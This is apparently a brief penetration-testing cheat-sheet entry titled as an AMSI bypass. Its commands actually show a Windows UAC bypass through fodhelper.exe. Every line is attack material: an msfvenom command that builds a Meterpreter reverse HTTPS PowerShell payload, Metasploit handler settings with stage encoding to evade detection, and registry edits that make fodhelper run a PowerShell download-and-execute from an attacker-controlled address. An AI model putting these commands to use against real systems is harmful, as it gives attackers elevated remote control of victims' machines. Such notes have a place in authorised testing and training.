Disable AMSI by setting registry key
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f ps1 -o rev.ps1
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lhost 192.168.119.120 set lport 443 set EnableStageEncoding true set StageEncoder x64/zutto_dekiru run
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1') | IEX" -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force C:\Windows\System32\fodhelper.exe
Last updated 1 year ago
